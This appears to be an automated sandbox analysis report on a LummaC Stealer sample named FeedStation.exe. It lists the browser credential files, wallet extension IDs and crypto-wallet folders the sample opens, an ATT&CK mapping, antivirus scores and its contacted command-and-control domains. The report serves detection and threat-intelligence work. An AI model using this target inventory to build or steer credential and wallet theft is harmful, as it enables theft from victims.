Source: C:\Users\user\Desktop\FeedStation.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: FeedStation.exe PID: 6416, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: FeedStation.exe, 00000000.00000003.2374434383.0000000000AA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Electrum-LTC
Source: FeedStation.exe, 00000000.00000003.2374434383.0000000000AA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/ElectronCash
Source: FeedStation.exe, 00000000.00000003.2374371822.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Jaxx Libertyn":")
Source: FeedStation.exe, 00000000.00000003.2374434383.0000000000AA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: FeedStation.exe, 00000000.00000003.2374979097.0000000000AA5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Exodus
Source: FeedStation.exe, 00000000.00000003.2374434383.0000000000AA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum
Source: FeedStation.exe, 00000000.00000003.2374371822.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: FeedStation.exe, 00000000.00000003.2374979097.0000000000AA5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\FeedStation.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ	Jump to behavior

Source: Yara match

File source: Process Memory Space: FeedStation.exe PID: 6416, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: FeedStation.exe PID: 6416, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	11 Virtualization/Sandbox Evasion	1 OS Credential Dumping	121 Security Software Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	11 Deobfuscate/Decode Files or Information	LSASS Memory	11 Virtualization/Sandbox Evasion	Remote Desktop Protocol	31 Data from Local System	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	3 Obfuscated Files or Information	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	1 File and Directory Discovery	Distributed Component Object Model	Input Capture	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	22 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
FeedStation.exe	55%	ReversingLabs	Win32.Trojan.LummaStealer
FeedStation.exe	64%	Virustotal		Browse

Source	Detection	Scanner	Label
https://sputnik-1985.com/api#	100%	Avira URL Cloud	malware
https://sputnik-1985.com/.	100%	Avira URL Cloud	malware
http://www.newsgator.com/U	0%	Avira URL Cloud	safe
https://sputnik-1985.com/.mgmd	100%	Avira URL Cloud	malware
https://sputnik-1985.com:443/api	100%	Avira URL Cloud	malware
http://www.bradsoft.com/feeddemon/help/3.0/enclosures/	0%	Avira URL Cloud	safe
https://sputnik-1985.com/api6C	100%	Avira URL Cloud	malware
http://www.newsgator.com/	0%	Avira URL Cloud	safe
https://sputnik-1985.com/api2	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
steamcommunity.com	104.102.49.254	true	false	high
sputnik-1985.com	104.21.112.1	true	false	high
sordid-snaked.cyou	unknown	unknown	false	high
diffuculttan.xyz	unknown	unknown	false	high
effecterectz.xyz	unknown	unknown	false	high
awake-weaves.cyou	unknown	unknown	false	high
immureprech.biz	unknown	unknown	false	high
wrathful-jammy.cyou	unknown	unknown	false	high
ingreem-eilish.biz	unknown	unknown	false	high
deafeninggeh.biz	unknown	unknown	false	high
debonairnukk.xyz	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
sordid-snaked.cyou	false	high
deafeninggeh.biz	false	high
effecterectz.xyz	false	high
wrathful-jammy.cyou	false	high
https://sputnik-1985.com/api	false	high
https://steamcommunity.com/profiles/76561199724331900	false	high
awake-weaves.cyou	false	high
immureprech.biz	false	high
debonairnukk.xyz	false	high
diffuculttan.xyz	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png	FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab	FeedStation.exe, 00000000.00000003.2332537156.0000000003818000.00000004.00000800.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2332414351.000000000381B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://player.vimeo.com	FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	FeedStation.exe, 00000000.00000003.2332537156.0000000003818000.00000004.00000800.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2332414351.000000000381B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp	FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2320868917.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/?subsection=broadcasts	FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp	false		high
